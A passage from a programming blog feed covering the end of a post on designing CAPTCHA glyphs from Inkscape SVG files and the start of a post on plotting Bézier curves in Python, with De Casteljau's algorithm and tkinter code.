<span class="n">args</span><span class="p">[</span><span class="n">kw</span><span class="p">]</span> <span class="o">=</span> <span class="p">[[</span><span class="nb">tuple</span><span class="p">([</span><span class="nb">int</span><span class="p">(</span><span class="nb">float</span><span class="p">(</span><span class="n">i</span><span class="p">))</span> <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="n">p</span><span class="o">.</span><span class="n">split</span><span class="p">(</span><span class="s1">','</span><span class="p">)])</span> <span class="k">for</span> <span class="n">p</span> <span class="ow">in</span> <span class="n">geo_el</span><span class="p">]</span> <span class="k">for</span> <span class="n">geo_el</span> <span class="ow">in</span> <span class="n">args</span><span class="p">[</span><span class="n">kw</span><span class="p">]]</span>
<span class="k">return</span> <span class="n">args</span>
<span class="c1"># print the glyph data.</span>
<span class="k">def</span> <span class="nf">pretty_print</span><span class="p">(</span><span class="n">args</span><span class="p">):</span>
<span class="n">keys</span> <span class="o">=</span> <span class="nb">sorted</span><span class="p">(</span><span class="n">args</span><span class="o">.</span><span class="n">keys</span><span class="p">())</span>
<span class="nb">print</span><span class="p">(</span><span class="s1">'----------------------- Next data -------------------------'</span><span class="p">)</span>
<span class="k">for</span> <span class="n">kw</span> <span class="ow">in</span> <span class="n">keys</span><span class="p">:</span>
<span class="nb">print</span><span class="p">(</span><span class="s1">'</span><span class="se">\n</span><span class="s1">***********</span><span class="se">\n</span><span class="s1">Point data for </span><span class="si">%s</span><span class="s1">'</span> <span class="o">%</span> <span class="n">kw</span><span class="p">)</span>
<span class="nb">print</span><span class="p">(</span><span class="n">args</span><span class="p">[</span><span class="n">kw</span><span class="p">])</span>
<span class="c1"># Returns a sublist up to the next cmd.</span>
<span class="k">def</span> <span class="nf">sublist</span><span class="p">(</span><span class="n">l</span><span class="p">):</span>
<span class="k">for</span> <span class="n">i</span><span class="p">,</span> <span class="n">e</span> <span class="ow">in</span> <span class="nb">enumerate</span><span class="p">(</span><span class="n">l</span><span class="p">):</span>
<span class="k">if</span> <span class="n">e</span> <span class="ow">in</span> <span class="s1">'CcQqLlZz'</span><span class="p">:</span> <span class="c1"># SVG path commands</span>
<span class="k">return</span> <span class="n">l</span><span class="p">[</span><span class="mi">0</span><span class="p">:</span><span class="n">i</span><span class="p">]</span>
<span class="c1"># Check if element is a command within d attribute in element.</span>
<span class="k">def</span> <span class="nf">is_cmd</span><span class="p">(</span><span class="n">e</span><span class="p">):</span>
<span class="k">if</span> <span class="n">e</span> <span class="ow">in</span> <span class="s1">'CcQqLlZzMm'</span><span class="p">:</span>
<span class="k">return</span> <span class="kc">True</span>
<span class="k">else</span><span class="p">:</span>
<span class="k">return</span> <span class="kc">False</span>
<span class="c1"># Make chunks </span>
<span class="k">def</span> <span class="nf">chunks</span><span class="p">(</span><span class="n">l</span><span class="p">,</span> <span class="n">n</span><span class="p">):</span>
<span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="nb">len</span><span class="p">(</span><span class="n">l</span><span class="p">),</span> <span class="n">n</span><span class="o">-</span><span class="mi">1</span><span class="p">):</span>
<span class="k">yield</span> <span class="n">l</span><span class="p">[</span><span class="n">i</span><span class="p">:</span><span class="n">i</span> <span class="o">+</span> <span class="n">n</span><span class="p">]</span>
<span class="k">if</span> <span class="vm">__name__</span> <span class="o">==</span> <span class="s1">'__main__'</span><span class="p">:</span>
<span class="k">try</span><span class="p">:</span>
<span class="nb">open</span><span class="p">(</span><span class="n">sys</span><span class="o">.</span><span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">],</span> <span class="s1">'r'</span><span class="p">)</span> <span class="c1"># raises an exception if file can't be located</span>
<span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="n">parse_path</span><span class="p">(</span><span class="n">sys</span><span class="o">.</span><span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">]):</span>
<span class="n">pretty_print</span><span class="p">(</span><span class="n">i</span><span class="p">)</span>
<span class="k">except</span> <span class="ne">FileNotFoundError</span> <span class="k">as</span> <span class="n">e</span><span class="p">:</span>
<span class="nb">print</span><span class="p">(</span><span class="s1">'[-] No such file, sir'</span><span class="p">)</span>
<span class="k">except</span> <span class="ne">IndexError</span><span class="p">:</span>
<span class="nb">print</span><span class="p">(</span><span class="s1">'[-] Usage: </span><span class="si">%s</span><span class="s1"> SvgFile'</span> <span class="o">%</span> <span class="n">sys</span><span class="o">.</span><span class="n">argv</span><span class="p">[</span><span class="mi">0</span><span class="p">])</span>
</code></pre></div>
<p>Now the font design can finally begin! I searched for inspiration at
googlefonts and tried to redraw the glyphs freehand. This is of course
really unprofessional, because if you actually want to implement a
<em>real</em> font, you're better off using FontForge, a nice open source
program that incorporates many tools that help you create a
sophisticated font. I won't get down that path, instead I just
implemented some cool glyphs according to my taste and after a short
design period, I imported them with the script listed above into my
python font module that was already equipped with the plotting
algorithms I discussed in the <a href="http://incolumitas.com/2013/10/06/plotting-bezier-curves/">previous
article</a>. In
the aforementioned module, I am also going to store the glyph data
(Implemented as a list of points).</p>
<p>Here are some screenshots that you guys can get a impression how my
workflow was.</p>
<p>First I roughly outline the shape of the glyph and it looks like this: </p>
<p>[<img alt="raw-shaping a glyph" src="https://incolumitas.com/uploads/2013/10/unedited-1024x576.png"></p>
<p>Then after some reshaping: </p>
<p>[<img alt="fine-tuning the glyph" src="https://incolumitas.com/uploads/2013/10/better-1024x576.png"></p>
<p>And finally after I exported it and redrawn it using my own
module: [<img alt="plotting with own implementation" src="https://incolumitas.com/uploads/2013/10/Drawing_myself-1024x576.png"></p>
<p>And to end this post, I will present you my final alphabet all drawn on
a tkinter canvas with my own plotting algorithms. There are also
variants where the alphabet is skewed and a shear operations ar applied.
Here are the screenshots:</p>
<p>[<img alt="All Glyphs" src="https://incolumitas.com/uploads/2013/10/all_glyphs-1024x576.png"></p>
<p>All the glyphs drawn in a scatter. They are imported from the Inkscape
.svg files and plotted using the algorithms developed in the
<a href="http://incolumitas.com/2013/10/06/plotting-bezier-curves/">last</a> blot
post.</p>
<p>And after applying some linear transformations:</p>
<p>[<img alt="Shear
transformation" src="https://incolumitas.com/uploads/2013/10/shear_applied-1024x576.png"></p>
<p>In this picture all glyphs moved using shear operations</p>
<p>[<img alt="Skew transformation" src="https://incolumitas.com/uploads/2013/10/skew-1024x576.png">
Skew linear transformation.</p>
<p>My glyphs are far from beautiful or even consistent, but this isn't
really a drawback either, since I will use them for my captcha plugin
(Whose implementation in PHP will be presented in the next blog post).
But the clear advantage is obviously that all my glyphs (although they
don't really look so) consist of simple lines and Bézier splines, which
means that we can express them as a mathematical function and therefor
apply a wide range of transformations on them without any loss of
information! After blurring the glyphs to our liking, we can finally
export it as a raster grafics format (such as png) and they eventually
become immutable. Maybe I will add in the PHP imlementation a way to
fill the glyphs with color in order to obliterate pattern recognition
methods.<br>
As mentioned before, If you are interested in professional font/glyph
design, visit <a href="http://fontforge.org">fontforge.org</a> and read the great
resources over there.</p>
<p>And that's the end! Stay tuned for the final article of my series, that
will talk about the captcha plugin!</p>
<h3>Links</h3>
<ul>
<li><a href="https://github.com/NikolaiT/CunningCaptcha">The github repository that contains all of the above code
snippets</a></li>
<li><a href="http://fontforge.org">The fontforge home page</a></li>
<li><a href="http://inkscape.org/">The great vector drawing program Inkscape</a></li>
<li><a href="http://pomax.github.io/bezierinfo/">A wonderful insight into the applications of Bézier curves. Really
high quality stuff!</a></li>
<li>
<p><a href="http://en.wikipedia.org/wiki/Transformation_matrix">All possible ways to move/rotate/shear
points</a></p>
<ul>
<li><a href="http://en.wikipedia.org/wiki/Computer_font">Computer Fonts</a></li>
<li><a href="http://en.wikipedia.org/wiki/Bresenham's_line_algorithm">Rastering
lines</a></li>
<li><a href="http://en.wikipedia.org/wiki/B%C3%A9zier_curve">Wikipedia about Bézier
curves</a></li>
<li><a href="http://en.wikipedia.org/wiki/Scalable_Vector_Graphics">SVG w3
standard</a></li>
</ul>
</li>
<li>
<p><a href="http://en.wikipedia.org/wiki/Bresenham's_line_algorithm">Rastering
lines</a></p>
<ul>
<li><a href="http://en.wikipedia.org/wiki/B%C3%A9zier_curve">Wikipedia about Bézier
curves</a></li>
<li><a href="http://en.wikipedia.org/wiki/Scalable_Vector_Graphics">SVG w3
standard</a></li>
</ul>
</li>
</ul>Plotting Bézier curves directly and with De Casteljau's algorithm2013-10-06T23:23:00+02:002013-10-06T23:23:00+02:00Nikolai Tschachertag:incolumitas.com,2013-10-06:/2013/10/06/plotting-bezier-curves/<p><em>Last major Update: 21.10.2013</em> </p>
<p><a href="https://github.com/NikolaiT/CunningCaptcha/tree/master/python_tests">Github repo that contains the presented code in this
post.</a></p>
<h3>Introduction</h3>
<p>In this article I will present you a very simple and in no sense
optimized algorithm written in Python 3 that plots quadratic and cubic
Bézier curves. I'll implement several variants of Bézier rasterization
algorithms. Let's call the first version the direct approach, since it
computes the corresponding x and y coordinates directly by evaluation of
the equation that describes such Bézier curvatures. </p>
<p>The other possibility is De Casteljau's algorithm, a recursive
implementation. The general principle is illustrated
<a href="http://en.wikipedia.org/wiki/De_Casteljau's_algorithm#Geometric_interpretation">here</a>.
But the summarize the idea very briefly: In order to compute the points
of the Bézier curve, you subdivide the lines of the outer hull that are
given from the n+1 control points [Where n denotes the dimension of the
Bézier curve) at a ratio t (t goes from 0 to 1 in a loop). If you
connect the interpolation points, you'll obtain n-1 connected lines.
Then you apply the exactly same principle to these newly obtained lines
as before (recursive step), until you finally get one line remaining.
Consider again the point at the ratio t on this single line left and …</p><p><em>Last major Update: 21.10.2013</em> </p>
<p><a href="https://github.com/NikolaiT/CunningCaptcha/tree/master/python_tests">Github repo that contains the presented code in this
post.</a></p>
<h3>Introduction</h3>
<p>In this article I will present you a very simple and in no sense
optimized algorithm written in Python 3 that plots quadratic and cubic
Bézier curves. I'll implement several variants of Bézier rasterization
algorithms. Let's call the first version the direct approach, since it
computes the corresponding x and y coordinates directly by evaluation of
the equation that describes such Bézier curvatures. </p>
<p>The other possibility is De Casteljau's algorithm, a recursive
implementation. The general principle is illustrated
<a href="http://en.wikipedia.org/wiki/De_Casteljau's_algorithm#Geometric_interpretation">here</a>.
But the summarize the idea very briefly: In order to compute the points
of the Bézier curve, you subdivide the lines of the outer hull that are
given from the n+1 control points [Where n denotes the dimension of the
Bézier curve) at a ratio t (t goes from 0 to 1 in a loop). If you
connect the interpolation points, you'll obtain n-1 connected lines.
Then you apply the exactly same principle to these newly obtained lines
as before (recursive step), until you finally get one line remaining.
Consider again the point at the ratio t on this single line left and
BOOM you got your point on the Bézier curve for your specific t value.
Increase t and continue this process until you plotted the curve
(Graphic equivalent of the description see below. I don't own the image,
the source is: http://wiki.ece.cmu.edu)<br>
<img alt="Casteljau
Principle" src="http://wiki.ece.cmu.edu/ddl/images/DeCasteljau2.png"><br>
In this article, I'll supply source code snippets for both algorithms
mentioned above and will add a simple performance test to compare them.
Additionally, I am going to polish the direct approach for performance
and will depict some recipes I learned from other blogs to increase the
efficiency of the plotting algorithm.</p>
<h3>Background. Splines, What for?</h3>
<p>But why do I even need such geometrical primitives? I am currently
working on my captcha wordpress plugin, which builds the captcha from
the ground up and therefore needs some mechanism to rasterize
geometrical figures such as characters (Yes for once I am talking of
<em>those</em>, not the data type\^\^). Thus I need three different shapes:
Simple lines, circles (or more generally ellipses) and lastly Bézier
curves. I could compose rudimentary characters just with lines and
circles but we do have some ambition over here, don't we? :)</p>
<p>This means that I will essentially define a new, but very primitive
font. I guess that my font will contain around 10 to 15 glyphs and it
will use a mezcla (mix) of bitmap and outline fonts techniques. If you
want to know more about them, just <a href="http://en.wikipedia.org/wiki/Computer_font#Font_types">read
it up</a><a href="http://en.wikipedia.org/wiki/Computer_font#Font_types">.</a>
I am also going to publish a separate post blog about this font project
in the near future, so stay tuned (<strong>Edit:</strong> <a href="http://incolumitas.com/2013/10/16/create-your-own-font-the-hard-way/">The future has
arrived</a>.
I am really excited about how ugly and cruel this font is going to be
(Actually that's even an advantage for CAPTCHAS).</p>
<p>If you are further interested in the technical background knowledge and
mathematical properties of Bézier splines, consider reading the
<a href="http://en.wikipedia.org/wiki/B%C3%A9zier_curve">Wikipedia article</a> or
<a href="http://pomax.github.io/bezierinfo/">this wonderful tutorial</a> and then
there's also <a href="http://www.scratchapixel.com/lessons/3d-basic-lessons/lesson-11-rendering-the-teapot-bezier-surfaces/">this nice
introduction</a>.
The authors of those articles explain the concepts ways better than a
layman as I ever could. Here, I just present some simple code snippets
to get started and wet the appetite, as well as a discussion of
performance issues.</p>
<p>Finally we get to see some actual code. This python script essentially
draws quadratic and cubic Bézier curves. That's the direct approach as
stated above. Note that the code is yet horribly unoptimized.</p>
<div class="highlight"><pre><span></span><code><span class="kn">import</span> <span class="nn">tkinter</span>
<span class="kn">import</span> <span class="nn">math</span>
<span class="k">class</span> <span class="nc">Bezier</span><span class="p">(</span><span class="n">tkinter</span><span class="o">.</span><span class="n">Canvas</span><span class="p">):</span>
<span class="sd">'''</span>
<span class="sd"> Simple and slow algorithm to draw quadratic and </span>
<span class="sd"> cubic Bézier curves. Heavily inspired by http://pomax.github.io/bezierinfo/#control</span>
<span class="sd"> This code should just prove a concept and is not intended to be </span>
<span class="sd"> used in a real world app...</span>
<span class="sd"> Author: Nikolai Tschacher</span>
<span class="sd"> Date: 07.10.2013</span>
<span class="sd"> '''</span>
<span class="c1"># Because Canvas doesn't support simple pixel plotting,</span>
<span class="c1"># we need to help us out with a line with length 1 in</span>
<span class="c1"># positive x direction.</span>
<span class="k">def</span> <span class="nf">plot_pixel</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">x0</span><span class="p">,</span> <span class="n">y0</span><span class="p">):</span>
<span class="bp">self</span><span class="o">.</span><span class="n">create_line</span><span class="p">(</span><span class="n">x0</span><span class="p">,</span> <span class="n">y0</span><span class="p">,</span> <span class="n">x0</span><span class="o">+</span><span class="mi">1</span><span class="p">,</span> <span class="n">y0</span><span class="p">)</span>
<span class="c1"># Calculates the quadtratic Bézier polynomial for </span>
<span class="c1"># the n+1=3 coordinates.</span>
<span class="k">def</span> <span class="nf">quadratic_bezier_sum</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">t</span><span class="p">,</span> <span class="n">w</span><span class="p">):</span>
<span class="n">t2</span> <span class="o">=</span> <span class="n">t</span> <span class="o">*</span> <span class="n">t</span>
<span class="n">mt</span> <span class="o">=</span> <span class="mi">1</span><span class="o">-</span><span class="n">t</span>
<span class="n">mt2</span> <span class="o">=</span> <span class="n">mt</span> <span class="o">*</span> <span class="n">mt</span>
<span class="k">return</span> <span class="n">w</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span><span class="o">*</span><span class="n">mt2</span> <span class="o">+</span> <span class="n">w</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span><span class="o">*</span><span class="mi">2</span><span class="o">*</span><span class="n">mt</span><span class="o">*</span><span class="n">t</span> <span class="o">+</span> <span class="n">w</span><span class="p">[</span><span class="mi">2</span><span class="p">]</span><span class="o">*</span><span class="n">t2</span>
<span class="c1"># Calculates the cubic Bézier polynomial for </span>
<span class="c1"># the n+1=4 coordinates.</span>
<span class="k">def</span> <span class="nf">cubic_bezier_sum</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">t</span><span class="p">,</span> <span class="n">w</span><span class="p">):</span>
<span class="n">t2</span> <span class="o">=</span> <span class="n">t</span> <span class="o">*</span> <span class="n">t</span>
<span class="n">t3</span> <span class="o">=</span> <span class="n">t2</span> <span class="o">*</span> <span class="n">t</span>
<span class="n">mt</span> <span class="o">=</span> <span class="mi">1</span><span class="o">-</span><span class="n">t</span>
<span class="n">mt2</span> <span class="o">=</span> <span class="n">mt</span> <span class="o">*</span> <span class="n">mt</span>
<span class="n">mt3</span> <span class="o">=</span> <span class="n">mt2</span> <span class="o">*</span> <span class="n">mt</span>
<span class="k">return</span> <span class="n">w</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span><span class="o">*</span><span class="n">mt3</span> <span class="o">+</span> <span class="mi">3</span><span class="o">*</span><span class="n">w</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span><span class="o">*</span><span class="n">mt2</span><span class="o">*</span><span class="n">t</span> <span class="o">+</span> <span class="mi">3</span><span class="o">*</span><span class="n">w</span><span class="p">[</span><span class="mi">2</span><span class="p">]</span><span class="o">*</span><span class="n">mt</span><span class="o">*</span><span class="n">t2</span> <span class="o">+</span> <span class="n">w</span><span class="p">[</span><span class="mi">3</span><span class="p">]</span><span class="o">*</span><span class="n">t3</span>
<span class="k">def</span> <span class="nf">draw_quadratic_bez</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">p1</span><span class="p">,</span> <span class="n">p2</span><span class="p">,</span> <span class="n">p3</span><span class="p">):</span>
<span class="n">t</span> <span class="o">=</span> <span class="mi">0</span>
<span class="k">while</span> <span class="p">(</span><span class="n">t</span> <span class="o"><</span> <span class="mi">1</span><span class="p">):</span>
<span class="n">x</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">quadratic_bezier_sum</span><span class="p">(</span><span class="n">t</span><span class="p">,</span> <span class="p">(</span><span class="n">p1</span><span class="p">[</span><span class="mi">0</span><span class="p">],</span> <span class="n">p2</span><span class="p">[</span><span class="mi">0</span><span class="p">],</span> <span class="n">p3</span><span class="p">[</span><span class="mi">0</span><span class="p">]))</span>
<span class="n">y</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">quadratic_bezier_sum</span><span class="p">(</span><span class="n">t</span><span class="p">,</span> <span class="p">(</span><span class="n">p1</span><span class="p">[</span><span class="mi">1</span><span class="p">],</span> <span class="n">p2</span><span class="p">[</span><span class="mi">1</span><span class="p">],</span> <span class="n">p3</span><span class="p">[</span><span class="mi">1</span><span class="p">]))</span>
<span class="c1"># self.plot_pixel(math.floor(x), math.floor(y))</span>
<span class="bp">self</span><span class="o">.</span><span class="n">plot_pixel</span><span class="p">(</span><span class="n">x</span><span class="p">,</span> <span class="n">y</span><span class="p">)</span>
<span class="n">t</span> <span class="o">+=</span> <span class="mf">0.001</span> <span class="c1"># 1000 iterations. If you want the curve to be really</span>
<span class="c1"># fine grained, consider "t += 0.0001" for ten thousand iterations.</span>
<span class="k">def</span> <span class="nf">draw_cubic_bez</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">p1</span><span class="p">,</span> <span class="n">p2</span><span class="p">,</span> <span class="n">p3</span><span class="p">,</span> <span class="n">p4</span><span class="p">):</span>
<span class="n">t</span> <span class="o">=</span> <span class="mi">0</span>
<span class="k">while</span> <span class="p">(</span><span class="n">t</span> <span class="o"><</span> <span class="mi">1</span><span class="p">):</span>
<span class="n">x</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">cubic_bezier_sum</span><span class="p">(</span><span class="n">t</span><span class="p">,</span> <span class="p">(</span><span class="n">p1</span><span class="p">[</span><span class="mi">0</span><span class="p">],</span> <span class="n">p2</span><span class="p">[</span><span class="mi">0</span><span class="p">],</span> <span class="n">p3</span><span class="p">[</span><span class="mi">0</span><span class="p">],</span> <span class="n">p4</span><span class="p">[</span><span class="mi">0</span><span class="p">]))</span>
<span class="n">y</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">cubic_bezier_sum</span><span class="p">(</span><span class="n">t</span><span class="p">,</span> <span class="p">(</span><span class="n">p1</span><span class="p">[</span><span class="mi">1</span><span class="p">],</span> <span class="n">p2</span><span class="p">[</span><span class="mi">1</span><span class="p">],</span> <span class="n">p3</span><span class="p">[</span><span class="mi">1</span><span class="p">],</span> <span class="n">p4</span><span class="p">[</span><span class="mi">1</span><span class="p">]))</span>
<span class="bp">self</span><span class="o">.</span><span class="n">plot_pixel</span><span class="p">(</span><span class="n">math</span><span class="o">.</span><span class="n">floor</span><span class="p">(</span><span class="n">x</span><span class="p">),</span> <span class="n">math</span><span class="o">.</span><span class="n">floor</span><span class="p">(</span><span class="n">y</span><span class="p">))</span>
<span class="n">t</span> <span class="o">+=</span> <span class="mf">0.001</span>
<span class="k">if</span> <span class="vm">__name__</span> <span class="o">==</span> <span class="s1">'__main__'</span><span class="p">:</span>
<span class="n">master</span> <span class="o">=</span> <span class="n">tkinter</span><span class="o">.</span><span class="n">Tk</span><span class="p">()</span>
<span class="n">w</span> <span class="o">=</span> <span class="n">Bezier</span><span class="p">(</span><span class="n">master</span><span class="p">,</span> <span class="n">width</span><span class="o">=</span><span class="mi">1000</span><span class="p">,</span> <span class="n">height</span><span class="o">=</span><span class="mi">1000</span><span class="p">)</span>
<span class="n">w</span><span class="o">.</span><span class="n">pack</span><span class="p">()</span>
<span class="c1"># Finally draw some Bézier curves :)</span>
<span class="c1">#w.draw_quadratic_bez((70, 250), (62, 59), (250, 61))</span>
<span class="c1">#w.draw_quadratic_bez((170,77), (162, 159), (210, 161))</span>
<span class="n">w</span><span class="o">.</span><span class="n">draw_quadratic_bez</span><span class="p">((</span><span class="mi">0</span><span class="p">,</span> <span class="mi">100</span><span class="p">),</span> <span class="p">(</span><span class="mi">162</span><span class="p">,</span> <span class="mi">89</span><span class="p">),</span> <span class="p">(</span><span class="mi">250</span><span class="p">,</span> <span class="mi">61</span><span class="p">))</span>
<span class="c1">#w.draw_cubic_bez((120, 160), (35, 200), (153, 268), (165, 70))</span>
<span class="n">tkinter</span><span class="o">.</span><span class="n">mainloop</span><span class="p">()</span>
</code></pre></div>
<p>And now De Casteljau’s algorithm. It's not limited to quadratic and
cubic Bézier curves, on the contrary, you are free to plot curves of any
degree n. Just give it a try!</p>
<div class="highlight"><pre><span></span><code><span class="kn">import</span> <span class="nn">tkinter</span>
<span class="k">class</span> <span class="nc">InvalidInputError</span><span class="p">(</span><span class="ne">Exception</span><span class="p">):</span>
<span class="k">pass</span>
<span class="k">class</span> <span class="nc">Casteljau</span><span class="p">(</span><span class="n">tkinter</span><span class="o">.</span><span class="n">Canvas</span><span class="p">):</span>
<span class="sd">'''</span>
<span class="sd"> Implementation of de Casteljau's algorithm for drawing Bézier curves.</span>
<span class="sd"> Implemented along the submittal of http://pomax.github.io/bezierinfo/#control.</span>
<span class="sd"> Author: Nikolai Tschacher</span>
<span class="sd"> Date: 07.10.2013</span>
<span class="sd"> '''</span>
<span class="c1"># Because Canvas doesn't support simple pixel plotting,</span>
<span class="c1"># we need to help us out with a line with length 1 in</span>
<span class="c1"># positive x direction.</span>
<span class="k">def</span> <span class="nf">plot_pixel</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">x0</span><span class="p">,</span> <span class="n">y0</span><span class="p">):</span>
<span class="bp">self</span><span class="o">.</span><span class="n">create_line</span><span class="p">(</span><span class="n">x0</span><span class="p">,</span> <span class="n">y0</span><span class="p">,</span> <span class="n">x0</span><span class="o">+</span><span class="mi">1</span><span class="p">,</span> <span class="n">y0</span><span class="p">)</span>
<span class="k">def</span> <span class="nf">draw_curve</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">points</span><span class="p">,</span> <span class="n">t</span><span class="p">):</span>
<span class="c1"># Check that input parameters are valid. We don't check wheter </span>
<span class="c1"># the elements in the tuples are of type int or float.</span>
<span class="k">for</span> <span class="n">p</span> <span class="ow">in</span> <span class="n">points</span><span class="p">:</span>
<span class="k">if</span> <span class="p">(</span><span class="ow">not</span> <span class="nb">isinstance</span><span class="p">(</span><span class="n">p</span><span class="p">,</span> <span class="nb">tuple</span><span class="p">)</span> <span class="ow">or</span> <span class="ow">not</span> <span class="nb">len</span><span class="p">(</span><span class="n">p</span><span class="p">)</span> <span class="o">==</span> <span class="mi">2</span><span class="p">):</span>
<span class="k">raise</span> <span class="n">InvalidInputError</span><span class="p">(</span><span class="s1">'points is not a list of points(tuples)'</span><span class="p">)</span>
<span class="k">if</span> <span class="p">(</span><span class="nb">len</span><span class="p">(</span><span class="n">points</span><span class="p">)</span> <span class="o">==</span> <span class="mi">1</span><span class="p">):</span>
<span class="bp">self</span><span class="o">.</span><span class="n">plot_pixel</span><span class="p">(</span><span class="n">points</span><span class="p">[</span><span class="mi">0</span><span class="p">][</span><span class="mi">0</span><span class="p">],</span> <span class="n">points</span><span class="p">[</span><span class="mi">0</span><span class="p">][</span><span class="mi">1</span><span class="p">])</span>
<span class="k">else</span><span class="p">:</span>
<span class="n">newpoints</span> <span class="o">=</span> <span class="p">[]</span>
<span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="nb">len</span><span class="p">(</span><span class="n">points</span><span class="p">)</span><span class="o">-</span><span class="mi">1</span><span class="p">):</span>
<span class="n">x</span> <span class="o">=</span> <span class="p">(</span><span class="mi">1</span><span class="o">-</span><span class="n">t</span><span class="p">)</span> <span class="o">*</span> <span class="n">points</span><span class="p">[</span><span class="n">i</span><span class="p">][</span><span class="mi">0</span><span class="p">]</span> <span class="o">+</span> <span class="n">t</span> <span class="o">*</span> <span class="n">points</span><span class="p">[</span><span class="n">i</span><span class="o">+</span><span class="mi">1</span><span class="p">][</span><span class="mi">0</span><span class="p">]</span>
<span class="n">y</span> <span class="o">=</span> <span class="p">(</span><span class="mi">1</span><span class="o">-</span><span class="n">t</span><span class="p">)</span> <span class="o">*</span> <span class="n">points</span><span class="p">[</span><span class="n">i</span><span class="p">][</span><span class="mi">1</span><span class="p">]</span> <span class="o">+</span> <span class="n">t</span> <span class="o">*</span> <span class="n">points</span><span class="p">[</span><span class="n">i</span><span class="o">+</span><span class="mi">1</span><span class="p">][</span><span class="mi">1</span><span class="p">]</span>
<span class="n">newpoints</span><span class="o">.</span><span class="n">append</span><span class="p">((</span><span class="n">x</span><span class="p">,</span> <span class="n">y</span><span class="p">))</span>
<span class="bp">self</span><span class="o">.</span><span class="n">draw_curve</span><span class="p">(</span><span class="n">newpoints</span><span class="p">,</span> <span class="n">t</span><span class="p">)</span>
<span class="c1"># Use De Casteljau's algorithm with recursion eliminated, but the same</span>
<span class="c1"># geometrical approach. Idea: Eliminate the expensive stack frame generation</span>
<span class="c1"># that recursion comes with. Only quadratical Bézier curves.</span>
<span class="k">def</span> <span class="nf">draw_point2</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">points</span><span class="p">,</span> <span class="n">t</span><span class="p">):</span>
<span class="c1"># Vector addition of P0+P1</span>
<span class="n">q0_x</span><span class="p">,</span> <span class="n">q0_y</span> <span class="o">=</span> <span class="p">((</span><span class="mi">1</span><span class="o">-</span><span class="n">t</span><span class="p">)</span> <span class="o">*</span> <span class="n">points</span><span class="p">[</span><span class="mi">0</span><span class="p">][</span><span class="mi">0</span><span class="p">]</span> <span class="o">+</span> <span class="n">t</span> <span class="o">*</span> <span class="n">points</span><span class="p">[</span><span class="mi">1</span><span class="p">][</span><span class="mi">0</span><span class="p">],</span>
<span class="p">(</span><span class="mi">1</span><span class="o">-</span><span class="n">t</span><span class="p">)</span> <span class="o">*</span> <span class="n">points</span><span class="p">[</span><span class="mi">0</span><span class="p">][</span><span class="mi">1</span><span class="p">]</span> <span class="o">+</span> <span class="n">t</span> <span class="o">*</span> <span class="n">points</span><span class="p">[</span><span class="mi">1</span><span class="p">][</span><span class="mi">1</span><span class="p">])</span>
<span class="n">q1_x</span><span class="p">,</span> <span class="n">q1_y</span> <span class="o">=</span> <span class="p">((</span><span class="mi">1</span><span class="o">-</span><span class="n">t</span><span class="p">)</span> <span class="o">*</span> <span class="n">points</span><span class="p">[</span><span class="mi">1</span><span class="p">][</span><span class="mi">0</span><span class="p">]</span> <span class="o">+</span> <span class="n">t</span> <span class="o">*</span> <span class="n">points</span><span class="p">[</span><span class="mi">2</span><span class="p">][</span><span class="mi">0</span><span class="p">],</span>
<span class="p">(</span><span class="mi">1</span><span class="o">-</span><span class="n">t</span><span class="p">)</span> <span class="o">*</span> <span class="n">points</span><span class="p">[</span><span class="mi">1</span><span class="p">][</span><span class="mi">1</span><span class="p">]</span> <span class="o">+</span> <span class="n">t</span> <span class="o">*</span> <span class="n">points</span><span class="p">[</span><span class="mi">2</span><span class="p">][</span><span class="mi">1</span><span class="p">])</span>
<span class="n">b_x</span><span class="p">,</span> <span class="n">b_y</span> <span class="o">=</span> <span class="p">((</span><span class="mi">1</span><span class="o">-</span><span class="n">t</span><span class="p">)</span><span class="o">*</span><span class="n">q0_x</span> <span class="o">+</span> <span class="n">t</span><span class="o">*</span><span class="n">q1_x</span><span class="p">,</span> <span class="p">(</span><span class="mi">1</span><span class="o">-</span><span class="n">t</span><span class="p">)</span><span class="o">*</span><span class="n">q0_y</span> <span class="o">+</span> <span class="n">t</span><span class="o">*</span><span class="n">q1_y</span><span class="p">)</span>
<span class="bp">self</span><span class="o">.</span><span class="n">plot_pixel</span><span class="p">(</span><span class="n">b_x</span><span class="p">,</span> <span class="n">b_y</span><span class="p">)</span>
<span class="c1"># Usage function for the algorithm.</span>
<span class="k">def</span> <span class="nf">draw</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">points</span><span class="p">):</span>
<span class="n">t</span> <span class="o">=</span> <span class="mi">0</span>
<span class="k">while</span> <span class="p">(</span><span class="n">t</span> <span class="o"><=</span> <span class="mi">1</span><span class="p">):</span>
<span class="bp">self</span><span class="o">.</span><span class="n">draw_curve</span><span class="p">(</span><span class="n">points</span><span class="p">,</span> <span class="n">t</span><span class="p">)</span>
<span class="n">t</span> <span class="o">+=</span> <span class="mf">0.001</span>
<span class="k">if</span> <span class="vm">__name__</span> <span class="o">==</span> <span class="s1">'__main__'</span><span class="p">:</span>
